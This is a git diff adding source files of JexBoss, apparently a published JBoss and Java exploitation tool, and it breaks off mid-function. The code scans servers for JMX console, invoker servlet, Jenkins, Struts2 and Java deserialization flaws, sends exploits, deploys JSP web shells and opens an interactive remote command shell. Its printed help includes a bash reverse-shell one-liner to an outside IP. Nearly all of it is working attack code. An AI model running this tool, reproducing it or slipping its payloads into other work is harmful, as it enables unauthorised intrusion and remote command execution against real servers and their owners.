a/jboss/_updates.py b/jboss/_updates.py new file mode 100644 index 0000000..8ea59aa --- /dev/null +++ b/jboss/_updates.py @@ -0,0 +1,144 @@ +# -*- coding: utf-8 -*- +""" +Module for managing updates to the JexBoss +https://github.com/joaomatosf/jexboss + +Copyright 2013 João Filho Matos Figueiredo + +Licensed under the Apache License, Version 2.0 (the "License"); +you may not use this file except in compliance with the License. +You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + +Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +See the License for the specific language governing permissions and +limitations under the License. +""" + +RED = '\x1b[91m' +RED1 = '\033[31m' +BLUE = '\033[94m' +GREEN = '\033[32m' +BOLD = '\033[1m' +NORMAL = '\033[0m' +ENDC = '\033[0m' + +import jexboss +from sys import version_info +import os +import shutil +from zipfile import ZipFile +import traceback +import logging, datetime +logging.captureWarnings(True) +FORMAT = "%(asctime)s (%(levelname)s): %(message)s" +logging.basicConfig(filename='jexboss_'+str(datetime.datetime.today().date())+'.log', format=FORMAT, level=logging.INFO) + + + +global gl_http_pool + + +def set_http_pool(pool): + global gl_http_pool + gl_http_pool = pool + + +def auto_update(): + """ + Download and deploy the latest version + :return: True if successfully updated + """ + url = 'https://github.com/joaomatosf/jexboss/archive/master.zip' + + # backup of prior version7 + if os.path.exists('old_version'): + shutil.rmtree('old_version') + shutil.copytree(".", "." + os.path.sep + "old_version") + + # download and extract of new version + jexboss.print_and_flush(GREEN + " * Downloading the new version from %s." %url +ENDC ) + r = gl_http_pool.request('GET', url) + if r.status != 200: + jexboss.print_and_flush(RED + " * Error: Could not complete the download of the new version. Check your internet connection." + ENDC) + return False + with open('master.zip', 'wb') as f: + f.write(r.data) + z = ZipFile('master.zip', 'r') + jexboss.print_and_flush(GREEN + " * Extracting new version..." +ENDC) + z.extractall(path='.') + z.close() + os.remove('master.zip') + path_new_version = '.' + os.path.sep + 'jexboss-master' + jexboss.print_and_flush(GREEN + " * Replacing the current version with the new version..." + ENDC) + for root, dirs, files in os.walk(path_new_version): + for file in files: + old_path = root.replace(path_new_version, '.') + os.path.sep + old_file = root.replace(path_new_version, '.') + os.path.sep + file + new_file = os.path.join(root, file) + + if not os.path.exists(old_path): + os.makedirs(old_path) + + shutil.move(new_file, old_file) + # remove extracted directory of the new version + shutil.rmtree('.'+os.path.sep+'jexboss-master') + + return True + + +def check_updates(): + """ + Checks if there is new version available + :return: boolean if there updates + """ + url = 'http://joaomatosf.com/rnp/releases.txt' + jexboss.print_and_flush(BLUE + " * Checking for updates in: %s **\n" % url + ENDC) + header = {"User-Agent": "Checking for updates"} + + try: + r = gl_http_pool.request('GET', url, redirect=False, headers=header) + except: + jexboss.print_and_flush(RED + " * Error: Failed to check for updates ...\n" + ENDC) + logging.warning("Failed to check for updates.", exc_info=traceback) + return False + + if r.status != 200: + jexboss.print_and_flush(RED + " * Error: could not check for updates ...\n" + ENDC) + logging.warning("Failed to check for updates. HTTP Code: %s" % r.status) + return False + else: + current_version = jexboss.__version__ + link = 'https://github.com/joaomatosf/jexboss/archive/master.zip' + date_last_version = '' + notes = [] + # search for new versions + resp = str(r.data).replace('\\n','\n') + for line in resp.split('\n'): + if "#" in line: + continue + if 'last_version' in line: + last_version = line.split()[1] + elif 'date:' in line: + date_last_version = line.split()[1] + elif 'link:' in line: + link = line + elif '* ' in line: + notes.append(line) + elif 'version:' in line and 'last_' not in line: + break + # compare last_version with current version + tup = lambda x: [int(y) for y in (x + '.0.0.0').split('.')][:3] + if tup(last_version) > tup(current_version): + jexboss.print_and_flush ( + GREEN + BOLD + " * NEW VERSION AVAILABLE: JexBoss v%s (%s)\n" % (last_version, date_last_version) + ENDC + + GREEN + " * Link: %s\n" % link + + GREEN + " * Release notes:") + for note in notes: + jexboss.print_and_flush (" %s" % note) + return True + else: + return False \ No newline at end of file diff --git a/jboss/jexboss.py b/jboss/jexboss.py new file mode 100644 index 0000000..9f35316 --- /dev/null +++ b/jboss/jexboss.py @@ -0,0 +1,1166 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- +""" +JexBoss: Jboss verify and EXploitation Tool +https://github.com/joaomatosf/jexboss + +Copyright 2013 João Filho Matos Figueiredo + +Licensed under the Apache License, Version 2.0 (the "License"); +you may not use this file except in compliance with the License. +You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + +Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +See the License for the specific language governing permissions and +limitations under the License. +""" +import textwrap +import traceback +import logging +import datetime +import signal +import _exploits +import _updates +from os import name, system +import os, sys +import shutil +from zipfile import ZipFile +from time import sleep +from random import randint +import argparse, socket +from sys import argv, exit, version_info +logging.captureWarnings(True) +FORMAT = "%(asctime)s (%(levelname)s): %(message)s" +logging.basicConfig(filename='jexboss_'+str(datetime.datetime.today().date())+'.log', format=FORMAT, level=logging.INFO) + +__author__ = "João Filho Matos Figueiredo " +__version__ = "1.2.4" + +RED = '\x1b[91m' +RED1 = '\033[31m' +BLUE = '\033[94m' +GREEN = '\033[32m' +BOLD = '\033[1m' +NORMAL = '\033[0m' +ENDC = '\033[0m' + + +def print_and_flush(message, same_line=False): + if same_line: + print (message), + else: + print (message) + if not sys.stdout.isatty(): + sys.stdout.flush() + + +if version_info[0] == 2 and version_info[1] < 7: + print_and_flush(RED1 + BOLD + "\n * You are using the Python version 2.6. The JexBoss requires version >= 2.7.\n" + "" + GREEN + " Please install the Python version >= 2.7. \n\n" + " Example for CentOS using Software Collections scl:\n" + " # yum -y install centos-release-scl\n" + " # yum -y install python27\n" + " # scl enable python27 bash\n" + ENDC) + logging.CRITICAL('Python version 2.6 is not supported.') + exit(0) + +try: + import readline + readline.parse_and_bind('set editing-mode vi') +except: + logging.warning('Module readline not installed. The terminal will not support the arrow keys.', exc_info=traceback) + print_and_flush(RED1 + "\n * Module readline not installed. The terminal will not support the arrow keys.\n" + ENDC) + + +try: + from urllib.parse import urlencode +except ImportError: + from urllib import urlencode + +try: + from urllib3.util import parse_url + from urllib3 import PoolManager + from urllib3 import ProxyManager + from urllib3 import make_headers + from urllib3.util import Timeout +except ImportError: + print_and_flush(RED1 + BOLD + "\n * Package urllib3 not installed. Please install the dependencies before continue.\n" + "" + GREEN + " Example: \n" + " # pip install -r requires.txt\n" + ENDC) + logging.critical('Module urllib3 not installed. See details:', exc_info=traceback) + exit(0) + +try: + import ipaddress +except: + print_and_flush(RED1 + BOLD + "\n * Package ipaddress not installed. Please install the dependencies before continue.\n" + "" + GREEN + " Example: \n" + " # pip install -r requires.txt\n" + ENDC) + logging.critical('Module ipaddress not installed. See details:', exc_info=traceback) + exit(0) + +global gl_interrupted +gl_interrupted = False +global gl_args +global gl_http_pool + + +def get_random_user_agent(): + user_agents = ["Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0", + "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0", + "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9", + "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36", + "Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0", + "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)", + "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)", + "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)", + "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0", + "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36", + "Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17", + "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0", + "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"] + return user_agents[randint(0, len(user_agents) - 1)] + + +def is_proxy_ok(): + print_and_flush(GREEN + "\n ** Checking proxy: %s **\n\n" % gl_args.proxy) + + headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Connection": "keep-alive", + "User-Agent": get_random_user_agent()} + try: + r = gl_http_pool.request('GET', gl_args.host, redirect=False, headers=headers) + except: + print_and_flush(RED + " * Error: Failed to connect to %s using proxy %s.\n" + " See logs for more details...\n" %(gl_args.host,gl_args.proxy) + ENDC) + logging.warning("Failed to connect to %s using proxy" %gl_args.host, exc_info=traceback) + return False + + if r.status == 407: + print_and_flush(RED + " * Error 407: Proxy authentication is required. \n" + " Please enter the correct login and password for authentication. \n" + " Example: -P http://proxy.com:3128 -L username:password\n" + ENDC) + logging.error("Proxy authentication failed") + return False + + elif r.status == 503 or r.status == 502: + print_and_flush(RED + " * Error %s: The service %s is not availabel to your proxy. \n" + " See logs for more details...\n" %(r.status,gl_args.host)+ENDC) + logging.error("Service unavailable to your proxy") + return False + else: + return True + + +def configure_http_pool(): + + global gl_http_pool + + if gl_args.mode == 'auto-scan' or gl_args.mode == 'file-scan': + timeout = Timeout(connect=1.0, read=3.0) + else: + timeout = Timeout(connect=gl_args.timeout, read=6.0) + + if gl_args.proxy: + # when using proxy, protocol should be informed + if (gl_args.host is not None and 'http' not in gl_args.host) or 'http' not in gl_args.proxy: + print_and_flush(RED + " * When using proxy, you must specify the http or https protocol" + " (eg. http://%s).\n\n" %(gl_args.host if 'http' not in gl_args.host else gl_args.proxy) +ENDC) + logging.critical('Protocol not specified') + exit(1) + + try: + if gl_args.proxy_cred: + headers = make_headers(proxy_basic_auth=gl_args.proxy_cred) + gl_http_pool = ProxyManager(proxy_url=gl_args.proxy, proxy_headers=headers, timeout=timeout, cert_reqs='CERT_NONE') + else: + gl_http_pool = ProxyManager(proxy_url=gl_args.proxy, timeout=timeout, cert_reqs='CERT_NONE') + except: + print_and_flush(RED + " * An error occurred while setting the proxy. Please see log for details..\n\n" +ENDC) + logging.critical('Error while setting the proxy', exc_info=traceback) + exit(1) + else: + gl_http_pool = PoolManager(timeout=timeout, cert_reqs='CERT_NONE') + + +def handler_interrupt(signum, frame): + global gl_interrupted + gl_interrupted = True + print_and_flush ("Interrupting execution ...") + logging.info("Interrupting execution ...") + exit(1) + +signal.signal(signal.SIGINT, handler_interrupt) + + +def check_connectivity(host, port): + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(2) + s.connect((str(host), int(port))) + s.close() + except socket.timeout: + logging.info("Failed to connect to %s:%s" %(host,port)) + return False + except: + logging.info("Failed to connect to %s:%s" % (host, port)) + return False + + return True + + +def check_vul(url): + """ + Test if a GET to a URL is successful + :param url: The URL to test + :return: A dict with the exploit type as the keys, and the HTTP status code as the value + """ + url_check = parse_url(url) + if '443' in str(url_check.port) and url_check.scheme != 'https': + url = "https://"+str(url_check.host)+":"+str(url_check.port)+str(url_check.path) + + print_and_flush(GREEN + "\n ** Checking Host: %s **\n" % url) + logging.info("Checking Host: %s" % url) + + headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Connection": "keep-alive", + "User-Agent": get_random_user_agent()} + + paths = {"jmx-console": "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo", + "web-console": "/web-console/Invoker", + "JMXInvokerServlet": "/invoker/JMXInvokerServlet", + "admin-console": "/admin-console/", + "Application Deserialization": "", + "Servlet Deserialization" : "", + "Jenkins": "", + "Struts2": "", + "JMX Tomcat" : ""} + + fatal_error = False + + for vector in paths: + r = None + if gl_interrupted: break + try: + + # check jmx tomcat only if specifically chosen + if (gl_args.jmxtomcat and vector != 'JMX Tomcat') or\ + (not gl_args.jmxtomcat and vector == 'JMX Tomcat'): continue + + if gl_args.app_unserialize and vector != 'Application Deserialization': continue + + if gl_args.struts2 and vector != 'Struts2': continue + + if gl_args.servlet_unserialize and vector != 'Servlet Deserialization': continue + + if gl_args.jboss and vector not in ('jmx-console', 'web-console', 'JMXInvokerServlet', 'admin-console'): continue + + if gl_args.jenkins and vector != 'Jenkins': continue + + if gl_args.force: + paths[vector] = 200 + continue + + print_and_flush(GREEN + " [*] Checking %s: %s" % (vector, " " * (27 - len(vector))) + ENDC, same_line=True) + + # check jenkins + if vector == 'Jenkins': + + cli_port = None + # check version and search for CLI-Port + r = gl_http_pool.request('GET', url, redirect=True, headers=headers) + all_headers = r.getheaders() + + # versions > 658 are not vulnerable + if 'X-Jenkins' in all_headers: + version = int(all_headers['X-Jenkins'].split('.')[1].split('.')[0]) + if version >= 638: + paths[vector] = 505 + continue + + for h in all_headers: + if 'CLI-Port' in h: + cli_port = int(all_headers[h]) + break + + if cli_port is not None: + paths[vector] = 200 + else: + paths[vector] = 505 + + # chek vul for Java Unserializable in Application Parameters + elif vector == 'Application Deserialization': + + r = gl_http_pool.request('GET', url, redirect=False, headers=headers) + if r.status in (301, 302, 303, 307, 308): + cookie = r.getheader('set-cookie') + if cookie is not None: headers['Cookie'] = cookie + r = gl_http_pool.request('GET', url, redirect=True, headers=headers) + # link, obj = _exploits.get_param_value(r.data, gl_args.post_parameter) + obj = _exploits.get_serialized_obj_from_param(str(r.data), gl_args.post_parameter) + + # if no obj serialized, check if there's a html refresh redirect and follow it + if obj is None: + # check if theres a redirect link + link = _exploits.get_html_redirect_link(str(r.data)) + + # If it is a redirect link. Follow it + if link is not None: + r = gl_http_pool.request('GET', url + "/" + link, redirect=True, headers=headers) + #link, obj = _exploits.get_param_value(r.data, gl_args.post_parameter) + obj = _exploits.get_serialized_obj_from_param(str(r.data), gl_args.post_parameter) + + # if obj does yet None + if obj is None: + # search for other params that can be exploited + list_params = _exploits.get_list_params_with_serialized_objs(str(r.data)) + if len(list_params) > 0: + paths[vector] = 110 + print_and_flush(RED + " [ CHECK OTHER PARAMETERS ]" + ENDC) + print_and_flush(RED + "\n * The \"%s\" parameter does not appear to be vulnerable.\n" %gl_args.post_parameter + + " But there are other parameters that it seems to be xD!\n" +ENDC+GREEN+ + BOLD+ "\n Try these other parameters: \n" +ENDC) + for p in list_params: + print_and_flush(GREEN + " -H %s" %p+ ENDC) + print ("") + elif obj is not None and obj == 'stateless': + paths[vector] = 100 + elif obj is not None: + paths[vector] = 200 + + # chek vul for Java Unserializable in viewState + elif vector == 'Servlet Deserialization': + + r = gl_http_pool.request('GET', url, redirect=False, headers=headers) + if r.status in (301, 302, 303, 307, 308): + cookie = r.getheader('set-cookie') + if cookie is not None: headers['Cookie'] = cookie + r = gl_http_pool.request('GET', url, redirect=True, headers=headers) + + if r.getheader('Content-Type') is not None and 'x-java-serialized-object' in r.getheader('Content-Type'): + paths[vector] = 200 + else: + paths[vector] = 505 + + elif vector == 'Struts2': + + result = _exploits.exploit_struts2_jakarta_multipart(url, 'jexboss', gl_args.cookies) + if result is None or "Could not get command" in str(result) : + paths[vector] = 100 + elif 'jexboss' in str(result) and "" not in str(result).lower(): + paths[vector] = 200 + else: + paths[vector] = 505 + + elif vector == 'JMX Tomcat': + + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(7) + host_rmi = url.split(':')[0] + port_rmi = int(url.split(':')[1]) + s.connect((host_rmi, port_rmi)) + s.send(b"JRMI\x00\x02K") + msg = s.recv(1024) + octets = str(msg[3:]).split(".") + if len(octets) != 4: + paths[vector] = 505 + else: + paths[vector] = 200 + + # check jboss vectors + elif vector == "JMXInvokerServlet": + # user privided web-console path and checking JMXInvoker... + if "/web-console/Invoker" in url: + paths[vector] = 505 + # if the user not provided the path, append the "/invoker/JMXInvokerServlet" + else: + + if not url.endswith(str(paths[vector])) and not url.endswith(str(paths[vector])+"/"): + url_to_check = url + str(paths[vector]) + else: + url_to_check = url + + r = gl_http_pool.request('HEAD', url_to_check , redirect=False, headers=headers) + # if head method is not allowed/supported, try GET + if r.status in (405, 406): + r = gl_http_pool.request('GET', url_to_check , redirect=False, headers=headers) + + # if web-console/Invoker or invoker/JMXInvokerServlet + if r.getheader('Content-Type') is not None and 'x-java-serialized-object' in r.getheader('Content-Type'): + paths[vector] = 200 + else: + paths[vector] = 505 + + elif vector == "web-console": + # user privided JMXInvoker path and checking web-console... + if "/invoker/JMXInvokerServlet" in url: + paths[vector] = 505 + # if the user not provided the path, append the "/web-console/..." + else: + + if not url.endswith(str(paths[vector])) and not url.endswith(str(paths[vector]) + "/"): + url_to_check = url + str(paths[vector]) + else: + url_to_check = url + + r = gl_http_pool.request('HEAD', url_to_check, redirect=False, headers=headers) + # if head method is not allowed/supported, try GET + if r.status in (405, 406): + r = gl_http_pool.request('GET', url_to_check, redirect=False, headers=headers) + + # if web-console/Invoker or invoker/JMXInvokerServlet + if r.getheader('Content-Type') is not None and 'x-java-serialized-object' in r.getheader('Content-Type'): + paths[vector] = 200 + else: + paths[vector] = 505 + + # other jboss vector + else: + r = gl_http_pool.request('HEAD', url + str(paths[vector]), redirect=False, headers=headers) + # if head method is not allowed/supported, try GET + if r.status in (405, 406): + r = gl_http_pool.request('GET', url + str(paths[vector]), redirect=False, headers=headers) + # check if the server respond with 200/500 for all requests + if r.status in (200, 500): + r = gl_http_pool.request('GET', url + str(paths[vector])+ '/github.com/joaomatosf/jexboss', redirect=False,headers=headers) + + if r.status == 200: + r.status = 505 + else: + r.status = 200 + + paths[vector] = r.status + + # ---------------- + # Analysis of the results + # ---------------- + # check if the proxy do not support running in the same port of the target + if r is not None and r.status == 400 and gl_args.proxy: + if parse_url(gl_args.proxy).port == url_check.port: + print_and_flush(RED + "[ ERROR ]\n * An error occurred because the proxy server is running on the " + "same port as the server port (port %s).\n" + " Please use a different port in the proxy.\n" % url_check.port + ENDC) + logging.critical("Proxy returns 400 Bad Request because is running in the same port as the server") + fatal_error = True + break + + # check if it's false positive + if r is not None and len(r.getheaders()) == 0: + print_and_flush(RED + "[ ERROR ]\n * The server %s is not an HTTP server.\n" % url + ENDC) + logging.error("The server %s is not an HTTP server." % url) + for key in paths: paths[key] = 505 + break + + if paths[vector] in (301, 302, 303, 307, 308): + url_redirect = r.get_redirect_location() + print_and_flush(GREEN + " [ REDIRECT ]\n * The server sent a redirect to: %s\n" % url_redirect) + elif paths[vector] == 200 or paths[vector] == 500: + if vector == "admin-console": + print_and_flush(RED + " [ EXPOSED ]" + ENDC) + logging.info("Server %s: EXPOSED" %url) + elif vector == "Jenkins": + print_and_flush(RED + " [ POSSIBLE VULNERABLE ]" + ENDC) + logging.info("Server %s: RUNNING JENKINS" %url) + elif vector == "JMX Tomcat": + print_and_flush(RED + " [ MAYBE VULNERABLE ]" + ENDC) + logging.info("Server %s: RUNNING JENKINS" %url) + else: + print_and_flush(RED + " [ VULNERABLE ]" + ENDC) + logging.info("Server %s: VULNERABLE" % url) + elif paths[vector] == 100: + paths[vector] = 200 + print_and_flush(RED + " [ INCONCLUSIVE - NEED TO CHECK ]" + ENDC) + logging.info("Server %s: INCONCLUSIVE - NEED TO CHECK" % url) + elif paths[vector] == 110: + logging.info("Server %s: CHECK OTHERS PARAMETERS" % url) + else: + print_and_flush(GREEN + " [ OK ]") + except Exception as err: + print_and_flush(RED + "\n * An error occurred while connecting to the host %s (%s)\n" % (url, err) + ENDC) + logging.info("An error occurred while connecting to the host %s" % url, exc_info=traceback) + paths[vector] = 505 + + if fatal_error: + exit(1) + else: + return paths + + +def auto_exploit(url, exploit_type): + """ + Automatically exploit a URL + :param url: The URL to exploit + :param exploit_type: One of the following + exploitJmxConsoleFileRepository: tested and working in JBoss 4 and 5 + exploitJmxConsoleMainDeploy: tested and working in JBoss 4 and 6 + exploitWebConsoleInvoker: tested and working in JBoss 4 + exploitJMXInvokerFileRepository: tested and working in JBoss 4 and 5 + exploitAdminConsole: tested and working in JBoss 5 and 6 (with default password) + """ + if exploit_type in ("Application Deserialization", "Servlet Deserialization"): + print_and_flush(GREEN + "\n * Preparing to send exploit to %s. Please wait...\n" % url) + else: + print_and_flush(GREEN + "\n * Sending exploit code to %s. Please wait...\n" % url) + + result = 505 + if exploit_type == "jmx-console": + + result = _exploits.exploit_jmx_console_file_repository(url) + if result != 200 and result != 500: + result = _exploits.exploit_jmx_console_main_deploy(url) + + elif exploit_type == "web-console": + + # if the user not provided the path + if url.endswith("/web-console/Invoker") or url.endswith("/web-console/Invoker/"): + url = url.replace("/web-console/Invoker", "") + + result = _exploits.exploit_web_console_invoker(url) + if result == 404: + host, port = get_host_port_reverse_params() + if host == port == gl_args.cmd == None: return False + result = _exploits.exploit_servlet_deserialization(url + "/web-console/Invoker", host=host, port=port, + cmd=gl_args.cmd, is_win=gl_args.windows, gadget=gl_args.gadget, + gadget_file=gl_args.load_gadget) + elif exploit_type == "JMXInvokerServlet": + + # if the user not provided the path + if url.endswith("/invoker/JMXInvokerServlet") or url.endswith("/invoker/JMXInvokerServlet/"): + url = url.replace("/invoker/JMXInvokerServlet", "") + + result = _exploits.exploit_jmx_invoker_file_repository(url, 0) + if result != 200 and result != 500: + result = _exploits.exploit_jmx_invoker_file_repository(url, 1) + if result == 404: + host, port = get_host_port_reverse_params() + if host == port == gl_args.cmd == None: return False + result = _exploits.exploit_servlet_deserialization(url + "/invoker/JMXInvokerServlet", host=host, port=port, + cmd=gl_args.cmd, is_win=gl_args.windows, gadget=gl_args.gadget, + gadget_file=gl_args.load_gadget) + + elif exploit_type == "admin-console": + + result = _exploits.exploit_admin_console(url, gl_args.jboss_login) + + elif exploit_type == "Jenkins": + + host, port = get_host_port_reverse_params() + if host == port == gl_args.cmd == None: return False + result = _exploits.exploit_jenkins(url, host=host, port=port, cmd=gl_args.cmd, is_win=gl_args.windows, + gadget=gl_args.gadget, show_payload=gl_args.show_payload) + elif exploit_type == "JMX Tomcat": + + host, port = get_host_port_reverse_params() + if host == port == gl_args.cmd == None: return False + result = _exploits.exploit_jrmi(url, host=host, port=port, cmd=gl_args.cmd, is_win=gl_args.windows) + + elif exploit_type == "Application Deserialization": + + host, port = get_host_port_reverse_params() + + if host == port == gl_args.cmd == gl_args.load_gadget == None: return False + + result = _exploits.exploit_application_deserialization(url, host=host, port=port, cmd=gl_args.cmd, is_win=gl_args.windows, + param=gl_args.post_parameter, force=gl_args.force, + gadget_type=gl_args.gadget, show_payload=gl_args.show_payload, + gadget_file=gl_args.load_gadget) + + elif exploit_type == "Servlet Deserialization": + + host, port = get_host_port_reverse_params() + + if host == port == gl_args.cmd == gl_args.load_gadget == None: return False + + result = _exploits.exploit_servlet_deserialization(url, host=host, port=port, cmd=gl_args.cmd, is_win=gl_args.windows, + gadget=gl_args.gadget, gadget_file=gl_args.load_gadget) + + elif exploit_type == "Struts2": + + result = 200 + + # if it seems to be exploited (201 is for jboss exploited with gadget) + if result == 200 or result == 500 or result == 201: + + # if not auto_exploit, ask type enter to continue... + if not gl_args.auto_exploit: + + if exploit_type in ("Application Deserialization", "Jenkins", "JMX Tomcat", "Servlet Deserialization") or result == 201: + print_and_flush(BLUE + " * The exploit code was successfully sent. Check if you received the reverse shell\n" + " connection on your server or if your command was executed. \n"+ ENDC+ + " Type [ENTER] to continue...\n") + # wait while enter is typed + input().lower() if version_info[0] >= 3 else raw_input().lower() + return True + else: + if exploit_type == 'Struts2': + shell_http_struts(url) + else: + print_and_flush(GREEN + " * Successfully deployed code! Starting command shell. Please wait...\n" + ENDC) + shell_http(url, exploit_type) + + # if auto exploit mode, print message and continue... + else: + print_and_flush(GREEN + " * Successfully deployed/sended code via vector %s\n *** Run JexBoss in Standalone mode " + "to open command shell. ***" %(exploit_type) + ENDC) + return True + + # if not exploited, print error messagem and ask for type enter + else: + if exploit_type == 'admin-console': + print_and_flush(GREEN + "\n * You can still try to exploit deserialization vulnerabilitie in ViewState!\n" + + " Try this: python jexboss.py -u %s/admin-console/login.seam --app-unserialize\n" %url + + " Type [ENTER] to continue...\n" + ENDC) + + else: + print_and_flush(RED + "\n * Could not exploit the flaw automatically. Exploitation requires manual analysis...\n" + + " Type [ENTER] to continue...\n" + ENDC) + logging.error("Could not exploit the server %s automatically. HTTP Code: %s" %(url, result)) + # wait while enter is typed + input().lower() if version_info[0] >= 3 else raw_input().lower() + return False + + +def ask_for_reverse_host_and_port(): + print_and_flush(GREEN + " * Please enter the IP address and tcp PORT of your listening server for try to get a REVERSE SHELL.\n" + " OBS: You can also use the --cmd \"command\" to send specific commands to run on the server."+NORMAL) + + # If not *nix (that is, if somethine like git bash on Rwindow$) + if not sys.stdout.isatty(): + print_and_flush(" IP Address (RHOST): ", same_line=True) + host = input().lower() if version_info[0] >= 3 else raw_input().lower() + print_and_flush(" Port (RPORT): ", same_line=True) + port = input().lower() if version_info[0] >= 3 else raw_input().lower() + else: + host = input(" IP Address (RHOST): ").lower() if version_info[0] >= 3 else raw_input(" IP Address (RHOST): ").lower() + port = input(" Port (RPORT): ").lower() if version_info[0] >= 3 else raw_input(" Port (RPORT): ").lower() + + print ("") + return str(host), str(port) + + +def get_host_port_reverse_params(): + # if reverse host were provided in the args, take it + if gl_args.reverse_host: + + if gl_args.windows: + jexboss.print_and_flush(RED + "\n * WINDOWS Systems still do not support reverse shell.\n" + " Use option --cmd instead of --reverse-shell...\n" + ENDC + + " Type [ENTER] to continue...\n") + # wait while enter is typed + input().lower() if version_info[0] >= 3 else raw_input().lower() + return None, None + + tokens = gl_args.reverse_host.split(":") + if len(tokens) != 2: + host, port = ask_for_reverse_host_and_port() + else: + host = tokens[0] + port = tokens[1] + # if neither cmd nor reverse nor load_gadget was provided, ask host and port + elif gl_args.cmd is None and gl_args.load_gadget is None: + host, port = ask_for_reverse_host_and_port() + else: + # if cmd or gadget file ware privided + host, port = None, None + + return host, port + + +def shell_http_struts(url): + """ + Connect to an HTTP shell + :param url: struts app url + :param shell_type: The type of shell to connect to + """ + print_and_flush("# ----------------------------------------- #\n") + print_and_flush(GREEN + BOLD + " * For a Reverse Shell (like meterpreter =]), type sometime like: \n\n" + "\n" +ENDC+ + " Shell>/bin/bash -i > /dev/tcp/192.168.0.10/4444 0>&1 2>&1\n" + " \n"+GREEN+ + " And so on... =]\n" +ENDC + ) + print_and_flush("# ----------------------------------------- #\n") + + resp = _exploits.exploit_struts2_jakarta_multipart(url,'whoami', gl_args.cookies) + + print_and_flush(resp.replace('\\n', '\n'), same_line=True) + logging.info("Server %s exploited!" %url) + + while 1: + print_and_flush(BLUE + "[Type commands or \"exit\" to finish]" +ENDC) + + if not sys.stdout.isatty(): + print_and_flush("Shell> ", same_line=True) + cmd = input() if version_info[0] >= 3 else raw_input() + else: + cmd = input("Shell> ") if version_info[0] >= 3 else raw_input("Shell> ") + + if cmd == "exit": + break + + resp = _exploits.exploit_struts2_jakarta_multipart(url, cmd, gl_args.cookies) + print_and_flush(resp.replace('\\n', '\n')) + + +# FIX: capture the readtimeout File "jexboss.py", line 333, in shell_http +def shell_http(url, shell_type): + """ + Connect to an HTTP shell + :param url: The URL to connect to + :param shell_type: The type of shell to connect to + """ + headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Connection": "keep-alive", + "User-Agent": get_random_user_agent()} + + if gl_args.disable_check_updates: + headers['no-check-updates'] = 'true' + + if shell_type == "jmx-console" or shell_type == "web-console" or shell_type == "admin-console": + path = '/jexws4/jexws4.jsp?' + elif shell_type == "JMXInvokerServlet": + path = '/jexinv4/jexinv4.jsp?' + + gl_http_pool.request('GET', url+path, redirect=False, headers=headers) + + sleep(7) + resp = "" + print_and_flush("# ----------------------------------------- # LOL # ----------------------------------------- #\n") + print_and_flush(RED + " * " + url + ": \n" + ENDC) + print_and_flush("# ----------------------------------------- #\n") + print_and_flush(GREEN + BOLD + " * For a Reverse Shell (like meterpreter =]), type the command: \n\n" + " jexremote=YOUR_IP:YOUR_PORT\n\n" + ENDC + GREEN + + " Example:\n" +ENDC+ + " Shell>jexremote=192.168.0.10:4444\n" + "\n" +GREEN+ + " Or use other techniques of your choice, like:\n" +ENDC+ + " Shell>/bin/bash -i > /dev/tcp/192.168.0.10/4444 0>&1 2>&1\n" + " \n"+GREEN+ + " And so on... =]\n" +ENDC + ) + print_and_flush("# ----------------------------------------- #\n") + + for cmd in ['uname -a', 'cat /etc/issue', 'id']: + cmd = urlencode({"ppp": cmd}) + try: + r = gl_http_pool.request('GET', url + path + cmd, redirect=False, headers=headers) + resp += " " + str(r.data).split(">")[1] + except: + print_and_flush(RED + " * Apparently an IPS is blocking some requests. Check for updates will be disabled...\n\n"+ENDC) + logging.warning("Disabling checking for updates.", exc_info=traceback) + headers['no-check-updates'] = 'true' + + print_and_flush(resp.replace('\\n', '\n'), same_line=True) + logging.info("Server %s exploited!" %url) + + while 1: + print_and_flush(BLUE + "[Type commands or \"exit\" to finish]" +ENDC) + + if not sys.stdout.isatty(): + print_and_flush("Shell> ", same_line=True) + cmd = input() if version_info[0] >= 3 else raw_input() + else: + cmd = input("Shell> ") if version_info[0] >= 3 else raw_input("Shell> ") + + if cmd == "exit": + break + + cmd = urlencode({"ppp": cmd}) + try: + r = gl_http_pool.request('GET', url + path + cmd, redirect=False, headers=headers) + except: + 